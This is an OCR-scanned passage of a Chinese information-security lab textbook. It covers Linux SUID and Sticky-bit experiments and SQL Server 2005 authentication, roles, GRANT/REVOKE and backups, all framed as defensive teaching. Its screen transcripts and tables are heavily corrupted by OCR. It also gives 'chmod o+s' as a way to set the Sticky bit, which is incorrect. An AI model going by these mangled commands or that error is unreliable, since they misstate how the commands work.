rootgubuntu:-£ su linda 
lindagubuntu:/root$ cd /tmp 
lindagubuntu chmod o«r data 
lindagubuntu chmod o«w data 
lindagubuntu: chmod о+х data 
Lindagubuntu: su lucy 


tmp$ 15 data 


tmpS cd data 
tmp/data$ touch worldhello 
:/tmp/dataS ls -1 


linda linda 8 Dec 18 21:17 helloworld 
lucy lucy Ө Dec 18 22:48 worldhello 
lucygubuntu: /tmp/dataS 


图 5.18 修改 目录 访问 权限 并 测试 
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5.4 Linux 特殊 权限 实验 


5.4.1 实验 目的 


掌握 Linux 中 SUID,SGID,Sticky 3 种 特殊 权限 的 含义 和 配置 方法 。 


5.4.2 实验 内 容 及 环境 


1. 实验 内 容 
SUID,SGID,Sticky 3 种 特殊 权限 的 设置 。 
2. 实验 环境 


主流 配置 计算 机 一 台 , 安 装 Ubuntul4. 04。 
5.4.3 实验 步骤 


1. SUID 特殊 权限 
1) 查找 系统 中 所 有 设置 了 SUID 权限 位 的 可 执行 文件 


Linux 中 有 一 类 具有 特殊 权限 的 可 执行 文件 , 当 执行 该 类 文件 时 会 使 普通 用 户 的 权 
限 得 到 提升 ,给 系统 带 来 很 大 的 安全 隐患 ,这 样 的 特殊 权限 是 通过 给 可 执行 文件 设置 


SUID 位 (有 时 简称 s 位 ) 来 实现 的 。 


find path -perm 用 于 根据 文件 权限 在 指定 路 径 下 查找 文件 ,有 З 种 形式 : 


(1) find path -perm mode; 
(2) find path -perm -mode; 


(3) find path -perm + mode, 


其 中 find path -perm mode 表示 严格 匹配 ,也 即 文件 权限 必须 跟 mode 完全 一 致 才能 
匹配 成 功 ; find path -perm -mode 表示 文件 权限 包含 mode 权限 的 文件 都 能 匹配 成 功 ; 


find path -perm 十 mode 表示 文件 权限 被 mode 权限 包含 的 文件 都 能 匹配 成 功 。 
在 5.1. 2 节 中 介绍 过 用 户 的 普通 权限 可 以 表示 成 3 位 十 进 制 数值 型 ,分 别 表示 


属 主 、 


同 组 用 户 和 其 他 用 户 的 权限 ,而 对 于 特殊 权限 SUID, SGID, Sticky, 也 可 以 表示 成 十 进 制 
值 ,其 中 4 表示 SUID、2 表示 SGID、1 代表 Sticky 权限 值 , 这 里 我 们 查找 的 是 设置 了 
SUID 位 的 所 有 程序 ,可 以 通过 用 find / -perm -4000 命令 找到 所 有 具有 s 位 权限 的 文件 。 


2) XH]/usr/bin/gpasswd 的 s 位 权限 
利用 chmod 命令 可 以 关闭 可 执行 文件 的 s 位 权限 ,如 图 5. 19 所 示 。 


OSO root@ubuntu: /usr/bin 
rootgubuntu:-£ cd /usr/bin 

root@ubuntu: /usr/bin# ls -l gpasswd 

-rwsr-xr-x 1 root root 68152 Jul 15 2015 @ 85509 


root@ubuntu: /usr/bin# chmod u-s gpasswd 
root@ubuntu: /usr/bin# ls -l gpasswd 

-rwxr-xr-x 1 root root 68152 Jul 15 2915 gpasswd 
root@ubuntu: /usr /binit 


图 5.19 XH] /usr/bin/gpasswd 的 s 位 权限 


€ 
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2. Sticky 特殊 权限 

如 果 多 个 用 户 对 同一 目录 具有 写 权 限 , 则 一 个 用 户 可 以 删除 另 一 个 用 户 创建 的 文件 ， 
给 系统 带 来 安全 隐患 。 如 果 在 目录 上 设置 Sticky 特殊 权限 , 则 可 以 防止 一 个 用 户 删 除 另 
-个 用 户 创建 的 文件 ,而 只 有 文件 或 目录 的 属 主 可 以 删除 该 文件 。 

(1) root 用 户 创建 目录 /tmp/bookstore, 查 看 目录 权限 ,可 以 看 到 在 默认 情况 下 目录 
对 非 同 组 的 其 他 用 户 只 有 读 和 执行 的 权限 ,因而 其 他 用 户 无 法 在 该 目录 下 新 建文 件 或 子 
目录 ,通过 指令 “chmod 777” 修 改 新 建 目录 的 权限 ,使 得 所 有 用 户 都 具有 所 有 权限 。 以 
linda 用 户 的 身份 登录 系统 ,进入 /tmp/bookstore 目录 后 创建 文件 helloworld, 切 换 lucy 
用 户 , 可 以 看 到 lucy 可 以 删除 linda 创建 的 文件 ,存在 安全 隐患 ,如 图 5. 20 所 示 。 


OS® root@ubuntu: /tmp 
root@ubuntu: /tmp# ls -l 


2 root root 4096 Dec 18 
- 1 root root 8 Dec 18 

drwxrwxrwx 2 linda linda 4096 Dec 18 | 

ги-ги-ги- 1 linda linda Dec 18 helloworld 

rw-r--r-- 1 root root Dec 18 4 unity support test.0 

drwxrwxrwt 2 root root 4 Dec 18 lum ) 


drwxr-xr-x 2 root root 6 Dec 18 


drwx 2 root root б Dec 18 E 
-rw-rw-r--+ 1 lucy lucy 6 Dec 18 20:23 worldhello 


rootgubuntu:/tnpi chmod 777 bookstore 
root@ubuntu: /tnp# su linda 
lindagubuntu:/tmp$ cd bookstore 
lindagubuntu:/tmp/bookstoreS touch helloworld 
lindagubuntu:/tmp/bookstore$ su lucy 
Password: 
lucyubuntu:/tmp/bookstore$ ls -a 
helloworld 
lucygubuntu: [tmp/bookstoreS rm helloworld 
rm: remove write-protected regular empty file ‘helloworld’? y 
lucyQubuntu:/tmp/bookstoreS ls -a 


lucygubuntu: /tnp/bookstores | 


图 5.20 目录 没有 设置 Sticky 位 带 来 的 安全 隐患 


(2) root 用 户 利用 chmod 1777 命令 或 chmod o+s 命令 设置 /tmp/bookstore 目录 
的 Sticky 权限 ,用 户 linda 再 次 在 该 目录 下 创建 helloworld 文件 ,可 以 发 现 lucy 无 法 删除 
该 文件 ,如 图 5. 21 所 示 。 


Ө © Ф® root@ubuntu: /tmp/bookstore 
root@ubunt cd /tnp 
/tmp# chnod 1777 bookstore 
:/tnp# ls -l 


2 root root 4096 Dec EE ookstore] 

1 root root Ө Dec :34 config-err-8JuQLs 
2 linda linda 4696 Dec 

1 linda linda 6 Dec 

1 root root Ө рес 

2 root root 4096 Dec 

2 root root 4096 Dec 

2 root root 4096 Dec H 

1 lucy lucy 6 Dec 123 worldhello 

i/tmpí cd 。 bookstore/ 


lindagubuntu:/tmp/bookstoreS touch helloworld 
lindagubuntu:/tmp/bookstore$ su lucy 
Password: 
lucygubuntu:/tmp/bookstoreS ls -a 

helloworld 
lucygubuntu: /tnp/bookstoreS гт helloworld 
rm: remove write-protected regular empty file ‘helloworld’? y 
rm: cannot remove ‘helloworld’: Operation not permitted 
lucygubuntu: /tmp/bookstoreS 


目录 设置 Sticky 位 可 防止 文件 被 其 他 用 户 删 除 
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5.5 Ж J 题 


CD 在 5.3.1 节 实验 中 分 别 利 用 自主 访问 控制 机 制 和 访问 控制 列表 为 用 户 授予 对 文 
件 的 写 权限 ,两 种 授权 有 何不 同 , 哪 种 更 安全 ? 

(2) 在 5.3.1 节 实验 中 ,用 户 test 创建 了 文件 aa, 通 过 授权 允许 zhang 读 写 , 但 不 允 
WHP Li 读 写 ,用 户 Li 能 绕 过 访问 控制 最 终 读 取 到 文件 aa 的 内 容 吗 ? 请 通过 实验 验证 
你 的 结论 。 

(3) 查找 资料 进一步 学 习 find 指令 的 用 法 ,利用 该 指令 查找 所 有 设置 了 SGID 位 、 
Sticky 位 的 文件 或 目录 。 

(4) SGID 通常 设置 在 目录 上 ,设置 了 SGID 的 目录 下 创建 的 文件 或 子 目 录 的 GID 为 
目录 的 GID, 请 设计 实验 验证 SGID 的 权限 。 
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1989 年 ,Microsoft 公司 与 Sybase, Aston-tate 公司 在 Sybase 数据 库 基 础 上 合作 开发 
T SQL Server 1. 0, 这 个 版 本 主要 面向 OS/2 平台 (CIBM 公司 研制 的 操作 系统 平台 ) 。 
1990 4E , Aston-tate 公司 退出 了 SQL Server 的 合作 开发 ,Microsoft 公司 出 于 自身 战略 考 
虑 ,希望 能 够 开发 基于 本 公司 服务 器 操作 系统 平台 Windows NT 的 SQL Server, 因 而 转 
向 了 Windows NT 的 关系 型 数据 库 系 统 的 开发 ,并 于 1993 年 与 Sybase 公司 合作 推出 了 
SQL Server 4. 2 for Windows NT。 这 是 一 个 桌面 型 数据 库 系 统 , 由 于 与 Windows NT 操 
作 系 统 具有 非常 好 的 集成 性 ,简捷 易 用 ,受到 了 用 户 的 欢迎 。 

1994 年 , Microsoft 公司 与 Sybase 公司 终止 合作 关系 。 从 此 ,微软 公司 致力 于 
Windows 平台 的 SQL Server 系统 开发 。1995 年 ,微软 公司 发 布 了 具有 重大 历史 意义 的 
新 一 代 关系 型 数据 库 产 品 Microsoft SQL Server 6。 这 一 版 本 在 性 能 上 得 到 了 很 大 提升 ， 
已 经 较 好 满足 小 型 电子 商务 和 内 联网 的 数据 管理 及 应 用 开发 需要 。 至 1996 年 推出 的 
Microsoft SQL Server 6. 5 版 ,已 成 为 数据 库 管理 系统 领域 较 具 竞争 力 的 产品 。1998 年 ， 
Microsoft 公司 重新 改写 了 SQL Server 原 有 产品 核心 数据 引擎 ,推出 了 Microsoft SQL 
Server 7, 该 版 本 功能 完备 ,操作 简捷 ,界面 美观 ,成 为 中 小 型 企业 数据 库 管 理 与 应 用 的 首 
选 产 品 o 

2000 年 ,Microsoft 公司 推出 了 企业 级 的 数据 库 系 统 Microsoft SQL Server 2000, 
这 一 版 本 在 可 伸缩 性 和 可 靠 性 等 方面 有 了 很 大 改进 ,并 且 提供 了 在 线 数据 分 析 (OLAP) 
等 商业 化 应 用 ,引入 了 数据 仓库 .数据 挖掘 等 新 特征 。Microsoft SQL Server 2000 在 市 场 上 
广 受 欢迎 ,市 场 占有 率 持续 提高 ,到 2001 年 已 成 为 市 场 份额 第 一 的 数据 库 管理 系统 产品 。 

2005 年 ,Microsoft 公司 推出 了 经 过 重大 改进 的 SQL Server 2005 ,该 版 本 开发 周期 
长 ,对 系统 特性 改进 众多 ,新 引进 了 报表 服务 、 集 成 服务 等 ,增强 了 对 . NET Framework 
的 支持 ,使 基于 数据 库 的 应 用 开发 效率 和 特性 得 到 进一步 提升 ,尤其 是 对 商务 智能 应 用 支 
持 的 改进 ,使 Microsoft SQL Server 2005 奠定 了 大 型 企业 级 数据 管理 应 用 系统 的 基础 。 同 
时 ,SQL Server 2005 提供 了 验证 和 授权 方面 的 很 多 改进 ,使 得 数据 库 的 执行 更 加 安全 。 

下 面 以 SQL Server 2005 为 例 . 介 绍 SQL Server 的 安全 机 制 。 


6.1 SQL Server 安全 机 制 概述 


安全 性 是 数据 库 管 理 系 统 和 以 数据 库 为 基础 的 应 用 系统 必须 重点 关注 的 问题 之 一 。 
确保 系统 内 存储 的 数据 不 被 非法 窃取 和 破坏 ,是 数据 库 应 用 系统 成 功 的 关键 。SQL 
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Server 2005 提供 了 多 种 安全 机 制 , 如 身份 验证 ,访问 控制 .备份 恢复 等 ,充分 运用 这 些 安 
全 机 制 ,可 以 确保 系统 中 存储 的 数据 具有 较 高 的 安全 性 。 


6.1.1 SQL Server 2005 安全 管理 结构 


SQL Server 2005 是 一 款 多 用 户 的 C/S 结构 的 数据 库 管理 系统 软件 。 用 户 可 以 通过 
SSMS(SQL Server Management Studio) 或 其 他 客户 端 程序 连接 SQL Server 服务 器 , 访 
问 和 操作 数据 库 及 其 中 的 数据 库 对 象 (如 表 、 视 图 等 )。 

SQL Server 对 数据 库 中 数据 的 安全 保护 主要 包括 两 个 阶段 : 身份 认证 和 访问 控制 。 

(1) 身份 认证 : 用 于 确保 只 有 合法 用 户 才能 连接 数据 库 服 务 器 。 在 SQL Server 中 可 
以 采用 Windows 身份 认证 和 SQL Server 身份 认证 两 种 模式 实现 对 用 户 身份 的 验证 。 身 
份 认证 处 于 SQL Server 安全 管理 的 外 层 , 可 以 阻止 非法 用 户 连 接 服务 器 。 

(2) 访问 控制 : 用 于 确保 合法 用 户 只 能 执行 权限 范围 内 的 操作 。 数 据 库 系统 中 每 个 
用 户 的 操作 权限 是 不 同 的 ,如 用 户 A 可 以 访问 数据 库 A, 但 不 能 访问 数据 库 B, 用 户 B 可 
以 对 数据 库 B 中 的 数据 表 进 行 新 建 、 删 除 或 查询 操作 ,而 用 户 C 只 能 对 数据 库 B 中 的 数 
据 表 执 行 查询 操作 。 在 给 每 个 用 户 授 权时 ,应 当 依 据 最 小 授权 的 原则 ,只 给 用 户 授予 完成 
任务 所 需要 的 最 小 权限 。 

SQL Server 2005 数据 库 管理 系统 可 以 同时 管理 多 个 数据 库 , 每 个 数据 库 中 包含 表 、 
视图 .索引 等 对 象 ,用 户 数据 存储 在 表 中 。 用 户 连 接 到 SQL Server 数据 库 管理 系统 后 ,可 
以 执行 新 建 数据 库 、 备 份 数据 库 、 创 建 表 、 创 建 索 引 、 往 表 中 插入 数据 ,查询 满足 一 定 条 件 
的 数据 等 操作 ,用 户 执行 这 些 操作 的 权限 划分 为 3 个 层次 : 系统 级 、 模 式 级 、. 数 据 级 。 系 
统 级 权限 主要 包括 新 建 数据 库 、 新 建 登录 删除 数据 库 .删除 登 录 、 备 份 数据 库 等 ; 模式 级 
权限 主要 包括 新 建 表 ,更 改 表 、 新 建 索引 、 新 建 视图 ,删除 视图 等 ; 数据 级 的 权限 主要 包括 
对 表 中 数据 的 增删 . 改 的 权限 ,如 图 6.1 所 示 。 


-------------—-з- 


系统 级 权限 
(对 数据 库 的 操作 权限 ) 


数据 级 权限 
(对 表 中 数据 的 增 、 删 、 改 权限 ) 


模式 级 权限 
(对 表 、 视 图 等 的 操作 权限 ) 


риу а ныны 


图 6.1 SQL Server 的 三 级 权限 


为 了 便于 用 户 授权 ,系统 预先 定义 了 两 类 角色 : 服务 器 角色 和 数据 库 角色 。 系 统 将 
对 服务 器 的 操作 权限 (修改 服务 器 配置 选项 、 新 建 数 据 库 、 新 建 登录 等 ) 进 行 分 组 ,定义 为 
不 同 的 服务 器 角色 ,通过 将 连接 服务 器 的 登录 名 归 和 对 应 的 服务 器 角色 ,可 以 使 该 登录 名 
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具有 服务 器 角色 所 拥有 的 权限 。 同 时 ,系统 将 对 数据 库 的 操作 权限 (新 建 表 、 新 建 视图 、 修 
改 表 等 ) 进 行 分 组 ,分 别 定义 为 不 同 的 角色 ,例如 : db. owner 是 数据 库 的 所 有 者 ,属于 该 
角色 的 数据 库 用 户 具 有 对 数据 库 执行 所 有 操作 的 权限 ,将 数据 库 用 户 归 入 到 数据 库 角 色 
中 ,该 用 户 也 就 具备 了 角色 所 拥有 的 权限 。 而 数据 库 用 户 与 服务 器 登录 名 之 间 则 是 通过 
映射 建立 对 应 的 关系 , 即 当 用 户 使 用 登录 名 和 口令 连接 服务 器 后 ,如 果 数 据 库 中 有 对 应 的 
用 户 与 登录 名 之 间 的 映射 关系 , 则 该 用 户 可 以 访问 数据 库 。 

在 SQL Server 中 ,为 了 方便 处 理 用 户 与 数据 库 对 象 之 间 的 关系 , 自 SQL Server 2005 
版 开始 ,增加 了 新 的 对 象 一 一 架构 。 数 据 库 对 象 不 再 归属 于 用 户 而 是 属于 架构 ,而 架构 的 
所 有 者 为 用 户 。 由 此 ,可 以 简化 对 数量 较 多 的 数据 库 对 象 的 管理 , 即 可 以 通过 对 数量 较 少 
的 架构 管理 来 实现 对 数量 较 多 的 数据 库 对 象 的 管理 ,SQL Server 安全 管理 体系 结构 如 
图 6.2 所 示 。 


Г 映射 = Н рч 
登录 名 FL ни agen 


T dut 


服务 器 角色 数据 库 角 色 


== 


r-—] 数据 库 架构 e X 


SQL Server 服 务 器 
实例 


图 6.2 SQL Server 安全 管理 体系 结构 


6.1.2 SQL Server 的 身份 认证 


连接 SQL Server 服务 器 的 身份 认证 方式 主要 有 两 种 : Windows 身份 认证 和 SQL 
Server 身份 认证 。 

1. Windows 身份 认证 模式 

此 模式 允许 用 户 使 用 Windows 操作 系统 的 域 用 户 管理 和 本 地 用 户 管理 模块 对 用 户 
身份 进行 验证 。 这 样 当 用 户 登录 Windows 系统 后 ,不 需要 再 次 输入 登录 名 和 密码 ,就 可 
以 连接 SQL Server 服务 。 但 是 ,需要 注意 的 是 ,并 不 是 所 有 Windows 系统 中 的 域 用 户 账 
号 和 本 地 账号 都 可 以 连接 SQL Server, 只 有 那些 在 SQL Server 中 有 对 应 的 登录 名 的 
Windows 账号 才能 够 通过 信任 连接 到 SQL Server 服务 。 

2. SQL Server 身份 认证 模式 

此 模式 使 用 SQL Server 独立 的 身份 认证 管理 模块 对 用 户 身 份 进行 认证 。 用 户 需 要 
向 SQL Server 注册 用 户 身 份 信息 ,这些 信息 存储 在 syslogins 表 中 。 当 用 户 登 录 时 ,SQL 
Server 负责 把 用 户 连接 服务 器 的 登录 名 、 口 令 与 syslogins 表 的 登录 项 进行 比较 ,如 果 能 
够 在 syslogins 表 中 找到 匹配 的 数据 行 ,用 户 就 可 以 通过 验证 ,连接 服务 器 。 

上 述 两 种 模式 中 , Windows 验证 模式 适用 于 Windows 平台 环境 ,可 以 有 效 利 用 
Windows 用 户 管 理 模块 的 功能 ,而 SQL Server 验证 模式 为 非 Windows 环境 的 身份 验证 
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提供 了 解决 方案 。 在 应 用 程序 开发 中 ,客户 端 程序 经 常 采 用 SQL Server 验证 的 方式 来 连 
接 服务 器 。 同 时 ,SQL Server 身份 验证 模式 在 一 定 程度 上 也 可 以 提高 系统 的 安全 性 ,这 
种 认证 模式 的 典型 不 足 是 : 用 户 需要 额外 维护 一 组 SQL Server 登录 名 和 口令 。 


6.1.3 SQL Server 的 访问 控制 


1. 服务 器 级 权限 

登录 名 是 服务 器 端的 主体 ,权限 的 设置 可 以 通过 “服务 器 角色 ”来 实现 。 服 务 器 角色 
是 SQL Server 系统 为 便于 对 登录 名 权限 的 管理 ,将 各 项 服务 器 权限 进行 归 类 分 组 后 形成 
的 权限 组 。 管 理 员 可 以 通过 将 登录 名 归 到 特定 的 服务 器 角色 中 ,实现 对 登录 名 权限 的 
授予 。 

系统 默认 提供 了 9 类 固定 服务 器 角色 ,这 些 固定 服务 器 角色 的 含义 如 表 6. 1 所 示 。 


表 6.1 常用 固定 服务 器 角色 


固定 服务 器 角色 ж xk 
bulkadmin 执行 大 数据 量 的 操作 ,如 BULK INSERT 
dbereator 创建 .更改 ,删除 和 还 原 任何 数据 库 


diskadmin 管理 磁盘 文件 

processadmin 管理 SQL Server 实例 中 运行 的 进程 

管理 登录 名 及 其 属性 ,可 以 执行 GRANT、DENY、REVOKE 来 管理 登录 名 在 服务 
器 和 数据 库 级 别 中 的 权限 ,以 及 重新 设置 登录 名 的 密码 

serveradmin 更 改 服务 器 范围 的 配置 选项 和 关闭 服务 器 

setupadmin 添加 和 删除 链接 的 服务 器 ,并 且 也 可 以 执行 某 些 系统 存储 过 程 

sysadmin 系统 管理 员 ,可 以 在 服务 器 中 执行 任何 操作 

public 任何 登录 名 都 属于 该 角色 ,一 般 只 具有 连接 服务 器 的 权限 


securityadmin 


如 果 固 定 服务 器 角色 无 法 满足 对 登录 名 授权 的 要 求 ,可 以 对 登录 名 进行 自 定义 权限 
设置 ,根据 用 户 需 要 ,将 服务 器 级 安全 对 象 的 访问 权限 授予 登录 名 。 

在 SQL Server 2005 中 ,安全 对 象 是 指 可 以 由 系统 进行 权限 控制 ,并 可 供用 户 访问 的 
系统 资源 、 进 程 以 及 对 象 等 。 服 务 器 级 的 安全 对 象 包括 端点 、 登 录 名 和 数据 库 。 将 服务 器 
级 安全 对 象 的 访问 权限 授予 登录 名 , 则 登录 名 连接 服务 器 后 ,就 可 以 执行 权限 赋予 的 操作 。 

2. 数据 库 级 权限 

登录 名 可 以 连接 服务 器 ,但 是 如 果 未 对 登录 名 作 数 据 库 操作 授权 ,或 者 登录 名 所 属 的 
服务 器 角色 没有 对 数据 库 进 行 操作 的 权限 , 则 该 登录 名 并 不 具有 对 数据 库 进行 操作 的 
权限 。 

在 SQL Server 2005 中 ,对 于 数据 库 的 访问 是 通过 数据 库 用 户 权限 管理 实现 的 。 登 
录 名 连接 服务 器 后 ,如 果 需 要 访问 数据 库 , 必 须 在 登录 名 与 数据 库 中 的 用 户 之 间 建 立 映 
射 , 建 立 映 射 后 ,该 登录 名 在 此 数据 库 中 的 权限 是 登录 名 本 身 具 有 的 对 数据 库 进 行 操作 的 
权限 和 被 映射 的 数据 库 用 户 权 限 的 并 集 。 

1) 数据 库 用 户 

数据 库 用 户 是 数据 库 级 的 安全 主体 ,是 对 数据 库 进 行 操作 的 对 象 。 要 使 数据 库 能 被 
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用 户 访问 ,数据 库 中 必须 建 有 用 户 。 系 统 为 每 个 数据 库 自动 创建 了 以 下 用 户 : 
INFORMATION_SCHEMA .sys.dbo 和 guest. 

(D dbo: 是 数据 库 所 有 者 用 户 。 顾 名 思 义 ,dbo 用 户 对 数据 库 拥有 所 有 权限 ,并 可 以 
将 这 些 权限 授予 其 他 用 户 。 在 SQL Server 2005 中 ,创建 数据 库 的 用 户 默 认 就 是 数据 库 
的 所 有 者 ,从 属于 服务 器 角色 sysadmin 的 登录 名 会 自动 映射 为 dbo 用 户 , 因 此 sysadmin 
角色 的 成 员 就 具有 对 数据 库 执行 任何 操作 的 权限 。 

(2) guest: 是 数据 库 的 客人 用 户 。 当 数据 库 中 存在 guest 用 户 , 则 所 有 登录 名 ,不 管 
是 否 具有 访问 数据 库 的 权限 ,都 可 以 访问 guest 用 户 所 在 的 数据 库 。 因 此 ,guest 用 户 的 
存在 会 降低 系统 的 安全 性 。 在 用 户 数 据 库 中 ,guest 用 户 默认 处 于 关闭 状态 ,而 在 master 
和 tempdb 数据 库 中 出 于 系统 运行 需要 ,guest 用 户 是 开启 的 。 

(3) sys HI INFORMATION SCHEMA; 此 两 类 用 户 是 为 使 用 sys #1 INFORMATION _ 
SCHEMA 架构 的 视图 而 创建 的 用 户 。 为 了 确保 系统 正常 运行 ,建议 不 要 修改 这 两 类 
HP. 

2) 数据 库 角 色 

新 创建 的 数据 库 用 户 虽然 可 以 访问 数据 库 , 但 是 能 够 执行 哪些 操作 ,必须 通过 对 数据 
库 用 户 进行 权限 设置 来 实现 。 对 数据 库 用 户 设置 权限 最 简单 的 方式 是 使 用 数据 库 角色 。 
数据 库 角 色 是 SQL Server 系统 对 数据 库 用 户 使 用 数据 库 的 权限 进行 分 组 归 类 后 预 设 而 
成 的 权限 组 。 通 过 将 数据 库 用 户 归 属 到 数据 库 角色 ,就 可 以 使 用 户 具 备 角色 所 有 的 权限 。 

在 SQL Server 2005 中 共 提 供 了 10 种 固定 数据 库 角 色 , 这 些 数据 库 角 色 代表 的 含义 
如 表 6. 2 所 示 。 


表 6.2 常用 固定 数据 库 角色 


固定 数据 库 角色 描 述 
db_accessadmin 添加 或 删除 数据 库 用 户 ,数据库 角色 
db_backupoperator 备份 数据 库 
db datareader 读 取 所 有 用 户 表 中 的 所 有 数据 
db_datawriter 添加 、 删 除 或 更 改 所 有 用 户 表 中 的 数据 
db_ddladmin 增加 、 修 改 或 删除 数据 库 中 的 对 象 . 如 数据 表 、 视 图 、 存 储 过程 等 


db_denydatareader 不 能 读 取 数据 库 内 用 户 表 中 的 任何 数据 
db_denydatawriter 不 能 添加 修改 或 删除 数据 库 内 用 户 表 中 的 任何 数据 


db_owner 数据 库 所 有 者 ,可 以 在 数据 库 中 执行 所 有 操作 ,dbo 用 户 是 其 中 的 成 员 
db_securityadmin 可 以 管理 数据 库 角 色 及 角色 中 的 成 员 , 也 可 以 管理 语句 权限 和 对 象 权限 
public 默认 只 有 读 取 数据 的 权限 .每 个 数据 库 用 户 都 是 public 角色 的 成 员 


如 果 固 定 的 数据 库 角 色 不 能 满足 对 用 户 权 限 管理 的 需要 ,可 以 通过 新 建 自 定义 数据 
库 角色 ,来 创建 更 多 的 数据 库 角色 。 创 建 自 定义 数据 库 角色 时 ,需要 先 给 角色 设置 权限 ， 
然后 将 用 户 添加 到 该 角色 中 ,这 与 固定 数据 库 角色 直接 添加 用 户 是 不 同 的 。 

在 某 些 应 用 环境 中 ,出 于 安全 考虑 ,要 求 某 些 用 户 只 能 通过 应 用 程序 来 访问 数据 库 ， 
而 不 能 直接 对 数据 库 进 行 操作 。 这 时 ,可 以 创建 应 用 程序 角色 , 当 用 户 的 应 用 程序 需要 操 
作 数 据 库 时 , 先 在 应 用 程序 中 启用 应 用 程序 角色 ,然后 用 户 在 应 用 程序 权限 的 控制 下 执行 
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相应 的 操作 。 因 此 ,使 用 应 用 程序 角色 在 一 定 程度 上 ,有 助 于 提高 系统 的 安全 性 。 
з. 数据 级 权限 
对 表 中 数据 的 操作 权限 主要 包括 增 、 删 \ 改 、 查 ,权限 的 授予 既 可 以 通过 图 形 化 用 户 界 
面 直接 操作 ,也 可 以 通过 GRANT、REVOKE 语句 来 进行 授权 。 
DBMS 通过 SQL 提供 的 GRANT 和 REVOKE 语句 定义 用 户 权 限 ,形成 授权 规则 ， 
并 将 其 记录 在 数据 字典 中 。 当 用 户 发 出 存 取 数 据 库 的 操作 请 求 后 ,DBMS 授权 子 系统 查 
找 数据 字典 ,根据 授权 规则 进行 合法 性 检查 ,以 决定 接受 还 是 拒绝 执行 此 操作 。 
1) GRANT 语句 
GRANT 语句 用 于 向 用 户 授予 权限 ,其 一 般 格式 为 : 
GRANT < 权限 列表 > ON < 数据 库 对 象 > 
TO < 用 户 列表 > 
[WITH GRANT OPTION]; 
选项 WITH GRANT OPTION 表示 被 授权 的 用 户 可 以 将 这 些 权 限 继 续 转 授 给 其 他 
用 户 。 
[5016.1] 现 有 学 生 表 ( 学 号 ,姓名 ,所 在 系 , 性 别 ), 把 查询 学 生 表 和 修改 学 生 学 号 的 
权限 授 给 用 户 UA ,并 人 允许 其 将 权限 转 授 出 去 。 
GRANT SELECT, UPDATE( 学 号 ) ON 学 生 
TO U4 
WITH GRANT OPTION 
2) REVOKE 语句 
权限 可 以 由 DBA 或 其 他 授权 者 用 REVOKE 语句 收回 ,其 一 般 格式 为 : 
REVOKE[ GRANT OPTION FOR] < 权限 列 表 > 
ON < 数据 库 对 象 > 
FROM < 用 户 列 表 > 
[ RESTRICT | CASCADE] ; 
选项 GRANT OPTION FOR 表示 收回 转 授 (GRANT OPTIOND UR; CASCADE 
表示 把 该 用 户 所 转 授 出 去 的 权限 同时 收回 ; RESTRICT 表示 限制 级 联 收回 ,也 即 只 有 当 
用 户 没有 给 其 他 用 户 授权 时 ,才能 收回 权限 ,否则 ,系统 拒绝 执行 收回 权限 动作 。 
【 例 6.2] 收回 用 户 U4 修改 学 生 学 号 的 权限 ,并 级 联 收回 所 授 出 的 权限 。 
REVOKE UPDATE( 学 号 ) 
ON 学 生 
FROM U4 
CASCADE 


6.1.4 架构 安全 管理 


架构 是 SQL Server 2005 版 开始 引进 的 一 项 新 特征 ,其 主要 作用 是 将 多 个 数据 库 对 
象 归属 到 架构 中 ,以 解决 用 户 与 对 象 之 间 因 从 属 关系 而 引起 的 管理 问题 。 例 如 , 当 数据 库 
中 对 象 较 多 ,如 有 多 达 几 百 个 数据 表 和 视图 ,并 且 需 要 将 这 些 表 和 视图 分 成 多 个 组 由 不 同 


E 信息 系统 安全 实验 教程 


用 户 分 别管 理 和 使 用 时 ,使 用 架构 就 可 以 很 好 地 简化 管理 的 复杂 性 。 

SQL Server 2000 及 以 前 版 本 在 数据 管理 中 ,数据 表 等 对 象 从 属于 用 户 ,如 果 要 删除 
用 户 , 需 要 先 将 该 用 户 下 的 对 象 删除 或 移动 到 其 他 用 户 ,这 在 对 象 数量 较 多 的 场合 中 效率 
是 非常 低 的 。 使 用 架构 ,可 以 先 将 数量 较 多 的 对 象 归 属 到 数据 较 少 的 架构 中 ,架构 再 归属 
到 用 户 ,这样 只 需要 移动 少量 架构 就 可 以 解决 大 量 数据 库 对 象 的 归属 问题 。 

因此 ,架构 类 似 于 文件 系统 中 的 文件 夹 , 作 为 一 种 容器 可 以 保存 下 层 对 象 。 通 过 对 架 
构 安全 对 象 进行 管理 ,也 可 以 提高 SQL Server 2005 的 安全 性 。 架 构 级 安全 对 象 包括 类 
型 .XML 架构 集合 .聚合 约束、 函数 .过程 、 队 列 ,统计 信息 、 同 义 词 . 表 、 视 图 和 等。 这些 对 
象 包含 在 架构 内 ,如 果 需 要 调用 架构 内 的 对 象 ,需要 指定 架构 的 名 称 ,如 以 下 代码 查询 
AdventureWorks 库 中 Department 表 Name 和 GroupName 列 的 数据 ,由 于 Department 
表 属 于 架构 HumanResources, 因 此 需要 指明 架构 的 名 称 : 


SELECT Name, GroupName FROM HumanResources. Department 


dbo 是 系统 默认 架构 ,因此 如 果 架 构 是 dbo, 则 无 须 指 明 架 构 名 称 。 如 以 下 代码 查询 
“产品 数据 表 ” 的 信息 ,因为 “产品 数据 表 ” 的 架构 为 dbo, 所 以 可 以 省 略 架构 名 称 : 


SELECT * FROM 产品 数据 表 


6.1.5 数据库 备 份 与 恢复 


在 数据 库 应 用 系统 的 实际 运行 过 程 中 ,会 存在 多 种 原因 造成 系统 出 错 或 数据 库 损坏 
等 故障 ,如 人 为 的 误 操作 、 刻 意 的 破坏 以 及 计算 机 软 、 硬 件 故障 ,甚至 还 有 各 种 不 可 阻挡 的 
自然 灾害 ,如 地 震 、 洪 水 等 。SQL Server 为 了 解决 数据 故障 问题 ,提供 了 数据 库 备 份 与 恢 
复 功 能 ,使 管理 员 可 以 在 系统 正常 运行 时 ,及 时 进行 备份 ; 而 在 系统 出 现 故 障 时 又 能 从 备 
份 中 把 数据 恢复 到 备份 时 的 状态 。 因 此 ,通过 数据 库 的 备份 和 恢复 ,可 以 最 大 限度 地 降低 
系统 故障 造成 的 不 良 影响 。 

1. 备份 类 型 

备份 是 为 了 将 当前 系统 正常 的 运行 状态 复制 下 来 ,以 备 将 来 需要 时 能 够 还 原 到 备份 
时 的 状态 ,使 系统 可 以 继续 正常 运行 。SQL Server 2005 提供 了 4 种 备份 方式 : 

。 完整 数据 库 备 份 ; 

。 差异 数据 库 备 份 ; 

。 事务 日 志 备 份 ; 

。 数据 库 文件 或 文件 组 备份 。 

完整 数据 库 备 份 : 是 指 对 整个 数据 库 进行 备份 ,在 数据 库 较 大 的 场合 ,备份 的 时 间 
